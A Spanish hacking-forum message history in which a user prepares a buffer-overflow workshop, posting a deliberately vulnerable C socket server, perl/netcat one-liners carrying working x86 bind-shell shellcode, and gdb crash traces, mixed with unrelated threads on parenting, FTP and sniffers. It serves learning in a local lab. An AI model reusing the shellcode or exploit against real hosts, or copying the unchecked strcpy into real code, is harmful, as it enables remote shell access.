Mensajes

Hola de nuevo!

He probado tu shellcode aparte, sin usar ningún tipo de código vulnerable, y me da "violacion de segmento". ¿Puede que esté la shellcode mal? Intentaré buscar una que haga un bindshell y probaré a ver.

Mmm, puede que la haya recortado mal, luego la miro, pero no es mía
_________________________________________________________________________
Vale, modifico, un detallito...

Al activar el randomize_va_space...

Código [Seleccionar] Expandir


juanra@Juanra:~$ sudo gdb -q serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 19/02/2011 13:09:38
19/02/2011 13:09:38   Starting up...

19/02/2011 13:09:41   Got connection from 127.0.0.1:46633
19/02/2011 13:09:41   RECV 113 bytes: ��������jfX�1�CRj
j��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
                          Rh//shh/bin��R��S��̀������������

Program received signal SIGSEGV, Segmentation fault.
0xbffff7c4 in ?? ()
(gdb)

RET correcto.

Y al desactivar...

Código [Seleccionar] Expandir


(gdb) r 31337
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 19/02/2011 13:10:53
19/02/2011 13:10:53   Starting up...

19/02/2011 13:10:56   Got connection from 127.0.0.1:60248
19/02/2011 13:10:56   RECV 113 bytes: ��������jfX�1�CRj
j��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
                          Rh//shh/bin��R��S��̀������������

Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb)


Ambos corren así:

Código [Seleccionar] Expandir


juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf"x3 . "\x00"' | nc -vv localhost 31337


¿? Voy a mirar a ver la shellcode...
_________________________________________________________________________
Modf: La shellcode va perfectamente

[valores y confianza]

A mi tampoco pero hay cosas que prefiero que no sepan...

Que yo sepa tienes 18/19 añitos xD. De todos modos, todo se debe saber, pero con valores y confianza. Sí, yo los tengo xD

De todas formas, no estoy a favor de esto que los padres espien y/o tengan controlados a los hijos todo el dia, mas bien pienso que lo primero es tener una buena relacion con ellos y que haya confianza para hablar cuando sea necesario, entre otras cosas. no al reves.
Si, ya se que hablo por hablar, pero que vamos, es mi opinion

Te has sacado un diez xD. Eres educador? Estoy de acuerdo contigo

La práctica amigo, la práctica. (Cuando ya llevas 8, te empieza a doler...xD)
Se realista, la sociedad a dado un vuelco y son pocos los adolescentes que tienen una gran confianza con sus padres, y seguro que si nos ponemos, ni hace 20 años les contábamos todo...
¿Por qué lo dices? 

Mmm, que malote Tzhed... Sí, para que los adolescentes tengan confianza con sus padres primero tienen que tenerla en la infancia. Y hay que saber cómo (sabeis que hay cursillos matrimoniales sobre eso?). Y lo digo porque siempre me estás respondiendo con una réplica razonable y que me hace pensar xD (no, no es un cumplido, es la verdad  ); aunque luego re-rrazono y te respondo

Un saludo!

Hola Javi!

Pues no sé, esta noche vuelvo a la carga  ... ¿Te funciona con mi comando exacto?
Sí, pero es que 100 buffer + 4 EBP + 4 ESP = 108 xD Luego hay que restarle cuatro pues al volver se restan cuatro bytes de la pila (ret). Finalmente... 104.

Eso último me extraña, no sé de dónde sale este último byte... Ahh xD del

Código (c) [Seleccionar] Expandir

buffer [cont-1]='\0';
No me había dado cuenta de que esto también me afectaba en ese ámbito... xD

Gracias! Seguiré probando...
PD: Esto es un code para ir preparando el taller, no el code que vamos a usar en el taller. Nadie es taaaan despistado jaja...

Bueno, después de solucionar el último problema ( y colgarlo ) me he puesto a explotar el dichoso servidor de pruebas que he hecho para el taller. Os vuelvo a remitir el código...

Código (c) [Seleccionar] Expandir


#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <signal.h>
#include <time.h>

int socketfd, newsocket;

int vuln (char *trampa)
{
char buffer [100];
strcpy (buffer, trampa);
}

void shutup (int signal)
{
times ();
printf ("Shutting down...\n\n");
close (newsocket);
close (socketfd);
exit (0);
}

int times ()
{
time_t now=time (0);
struct tm *ahora;
char buffer [40];
ahora=localtime ((const time_t*)&now);
strftime (buffer, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("%s   ", buffer);
return 0;
}

int main (int argc, char *argv [])
{
time_t now=time (0);
struct tm *ahora;
char hora [40];
ahora=localtime ((const time_t*)&now);
strftime (hora, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora);

if (getuid()!=0)
{
printf ("This proccess must be run by root.\n\n");
return 1;
}
if (argc<2)
{
printf ("Use: %s <PORT>\n\n", argv [0]);
return 1;
}
int cont;
struct sockaddr_in client, host;
char buffer [1024];
int size=sizeof (client);

socketfd=socket (2, 1 ,  0);
host.sin_family=AF_INET;
host.sin_port=htons (atoi (argv [1]));
host.sin_addr.s_addr=0;
bind (socketfd, (struct sockaddr*)&host, sizeof (struct sockaddr));

listen (socketfd, 3);

times ();
printf ("Starting up...\n\n");

signal (SIGTERM, shutup);
signal (SIGINT, shutup);

while (1)
{
newsocket=accept (socketfd, (struct sockaddr*)&client, &size);

times ();
printf ("Got connection from %s:%d\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));

cont=recv (newsocket, &buffer, 1024, 0);
while (cont>2)
{
times ();
buffer [cont-1]='\0';
printf ("RECV %d bytes: %s\n", cont, buffer);

vuln (buffer);
cont=recv (newsocket, &buffer, 1024, 0);
}
times ();
printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
close (newsocket);
}
close (socketfd);
return 0;
}



Y os remito el comando que estoy usando para explotar el fallo... [8 nops + 92 shellcode + 4 ret  + 1 null']

Código [Seleccionar] Expandir


juanra@Juanra:~$ perl -e 'print "\x90"x8 . "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\xc4\xf7\xff\xbf" . "\x00"' | nc -vv localhost 5555555

El null lo pongo porque en la línea ...

Código (c) [Seleccionar] Expandir


while (cont>2)
{
times ();
--> buffer [cont-1]='\0';
printf ("RECV %d bytes: %s\n", cont, buffer);

... el último byte (se programó así por el \n de muchos clientes) se borra.


El caso es que compilo sin ninguna protección...

Código [Seleccionar] Expandir


juanra@Juanra:~$ sudo gdb -q ./serv
[sudo] password for juanra:
(gdb) r 31337
Starting program: /home/juanra/serv 31337
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 01:05:14
18/02/2011 01:05:14   Starting up...

18/02/2011 01:05:21   Got connection from 127.0.0.1:45163
18/02/2011 01:05:21   RECV 113 bytes: ��������jfX�1�CRj
j��̀�jfXCRfhzifS��jQV��̀�fCCSV��̀�fCRRV��̀�jY�?̀Iy��
                          Rh//shh/bin��R��S��̀������������

Program received signal SIGSEGV, Segmentation fault.
0xbffff801 in ?? ()
(gdb) x/16x 0xbffff801
0xbffff801: 0x00000000 0x07000000 0x04000000 0x07000000
0xbffff811: 0x1c000000 0x10bffff8 0x02000000 0x00697a00
0xbffff821: 0x02000000 0x01000000 0x00000000 0xc4000000
0xbffff831: 0x00bffff7 0x5c000000 0x00bffff8 0xc4000000
(gdb) i r eip
eip            0xbffff801 0xbffff801
(gdb)

Fallo de segmentación al principio de la pila. Preguntas: ¿Por qué? ¿Cómo lo arreglo?
Llevo toda la noche pensando, pero no se me ocurre nada... Qué puede ser?

PD: Si os hace falta más información preguntadme.
Gracias! Un saludo
Sagrini

De nada!
Bueno, nosotros no podemos. Luego le escribiré a algún mod para que lo mueva, pero no pasa nada...

Sí. Así se ejecuta el cliente FTP de Windows. Todo va por comandos, a la vieja usanza. Es mucho más rápido, seguro, etc...
Y es fácil porque es un navegador. De todos modos, cada herramienta a su cosa. Es como usar Lynx para ver el foro (ver webs desde el shell). La diferencia son las ventajas.

Busca lo que más te guste y especialízate en eso. Yo aún no he posteado en algunos foros del fondo :-o jaja

Hola! Bien bienvenido jaja!
Pues esto puede que vaya en Dudas Generales, pero no pasa nada xD...

Vale, pues a mi me parece que el problema está en que tu versión de IE no es compatible con el servidor FTP. Te recomiendo que uses clientes de FTP hechos para ser clientes de FTP, en vez de navegadores. En tu sistema hay uno llamado "ftp" jaja...

Y te animo a que sigas preguntando todo lo que quieras, que aquí estamos para ayudarte
Un saludo
Sagrini

[Tienes que hacer en dos terminales diferentes en Ubuntu (en un sólo PC)]

Será broma, no?
1) Qué distribución usas.
2) Qué fallo te da.
3) Que versión de NC tienes

Tienes que hacer en dos terminales diferentes en Ubuntu (en un sólo PC)

Código [Seleccionar] Expandir


nc -vlp 31337


Código [Seleccionar] Expandir


nc -vv localhost 31337


[Aclaro que esto es algo que ya he solucionado, sólo que me ha resultado tan curioso que lo he puesto aquí xD.]

MODF: Como veo que no interesa mucho resolverlo (mi bandeja está a cero) pongo la respuesta...

Código (c) [Seleccionar] Expandir

buffer [cont-1]='\0';
Ahí se fastidia todo. El último byte se pone a cero. Como se arregla? Pues poniendo un último byte (por ejemplo, un nop) al final de la cadena...

Código (bash) [Seleccionar] Expandir

sagrini@sagrini:~$ perl -e 'print "\x90"x12 . "A"x92 . "\x7c\xfb\xff\xbf" . "x90"' | nc -vv localhost 31335

Un saludo!
____________________________________________________________________________________________________________

Aclaro que esto es algo que ya he solucionado, sólo que me ha resultado tan curioso que lo he puesto aquí xD.
Pista: Todo consiste en leer.

Bueno, estaba preparando todo para el taller de exploiting y me he encontrado con una situación un tanto curiosa...
Tengo este código vulnerable en C...

Código (c) [Seleccionar] Expandir


#include <sys/socket.h>
#include <arpa/inet.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <signal.h>
#include <time.h>

int socketfd, newsocket;

int feo ()
{
printf ("FEO");
exit (1);
}

int vuln (char *trampa)
{
char buffer [100];
strcpy (buffer, trampa);
}

void shutup (int signal)
{
times ();
printf ("Shutting down...\n\n");
close (newsocket);
close (socketfd);
exit (0);
}

int times ()
{
time_t now=time (0);
struct tm *ahora;
char buffer [40];
ahora=localtime ((const time_t*)&now);
strftime (buffer, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("%s   ", buffer);
return 0;
}

int main (int argc, char *argv [])
{
time_t now=time (0);
struct tm *ahora;
char hora [40];
ahora=localtime ((const time_t*)&now);
strftime (hora, 40, "%d/%m/%Y %H:%M:%S" , ahora);
printf ("SmallServ 2.0 - By Sagrini - Sagrini 2010 - %s\n", hora);

if (getuid()!=0)
{
printf ("This proccess must be run by root.\n\n");
return 1;
}
if (argc<2)
{
printf ("Use: %s <PORT>\n\n", argv [0]);
return 1;
}
int cont;
struct sockaddr_in client, host;
char buffer [1024];
int size=sizeof (client);

socketfd=socket (2, 1 ,  0);
host.sin_family=AF_INET;
host.sin_port=htons (atoi (argv [1]));
host.sin_addr.s_addr=0;
bind (socketfd, (struct sockaddr*)&host, sizeof (struct sockaddr));

listen (socketfd, 3);

times ();
printf ("Starting up...\n\n");

signal (SIGTERM, shutup);
signal (SIGINT, shutup);

while (1)
{
newsocket=accept (socketfd, (struct sockaddr*)&client, &size);

times ();
printf ("Got connection from %s:%d\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));

cont=recv (newsocket, &buffer, 1024, 0);
while (cont>2)
{
times ();
buffer [cont-1]='\0';
printf ("RECV %d bytes: %s\n", cont, buffer);

vuln (buffer);
cont=recv (newsocket, &buffer, 1024, 0);
}
times ();
printf ("Finishing connection from %s:%d\n\n", inet_ntoa (client.sin_addr), ntohs (client.sin_port));
close (newsocket);
}
close (socketfd);
return 0;
}


Y lo estaba explotando con este comando...

Código [Seleccionar] Expandir

sagrini@sagrini:~$ perl -e 'print "\x90"x12 . "A"x92 . "\x7c\xfb\xff\xbf"' | nc -vv localhost 31335

Ahora, abría con GDB y me mostraba esto...

Código [Seleccionar] Expandir


(gdb) r 31335
Starting program: /home/sagrini/serv 31335
SmallServ 2.0 - By Sagrini - Sagrini 2010 - 18/02/2011 00:02:07
18/02/2011 00:02:07   Starting up...

18/02/2011 00:02:10   Got connection from 127.0.0.1:57358
18/02/2011 00:02:10   RECV 108 bytes: ������������AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|��

Program received signal SIGSEGV, Segmentation fault.
0x00fffb7c in ?? ()
(gdb)


La pregunta es... ¿qué le pasa?
PD: Algunos os reiréis del código vulnerable, pero es lo que tenía a mano xD luego lo pasaremos xD
PD2: Es algo sencillo, pero me ha distraído un rato. Por favor, respuestas por PM xD.

Ganadores
Nadie xD

[Terminal 1]

Si no te va...
1) O es fallo del telnet
2) O es fallo del NC.
3) O es tu conexión.

3 descartado, pues has podido responder xD

Vamos a ver si es el NC:
Terminal 1

Código [Seleccionar] Expandir


nc -vlp 31337

Terminal 2

Código [Seleccionar] Expandir


nc -vv localhost 31337

Si puedes hablar entre los dos es fallo del telnet. Si te falla es que te estás equivocando en algo...

Ahora, si es fallo del telnet hazme caso y descarga el NC.

Suerte!

[he encontrado bastantes como netcat]

Hola a todos me acabo de registrar en esta comunidad con la intención de aprender mas sobre la informática, en primer lugar quisiera que me recomendaríais algún sniffer de red para ubuntu y con un manual detallado porque he encontrado bastantes como netcat pero no se utilizarlo, en windows solía usar abel&cain pero aun así no me funcionaba al 100% de lo que yo quería pues eso si me podéis recomendar alguno sencillo o alguno con un manual os lo agradecería muchísimo.
Gracias

Jaja! Has buscado como loco!

Bueno, bromas aparte, bienvenido xD
Yo te recomiendo tcpdump (puede que algo entrevesado xD) o dsniff (dicen que es más sencillito )

Suerte!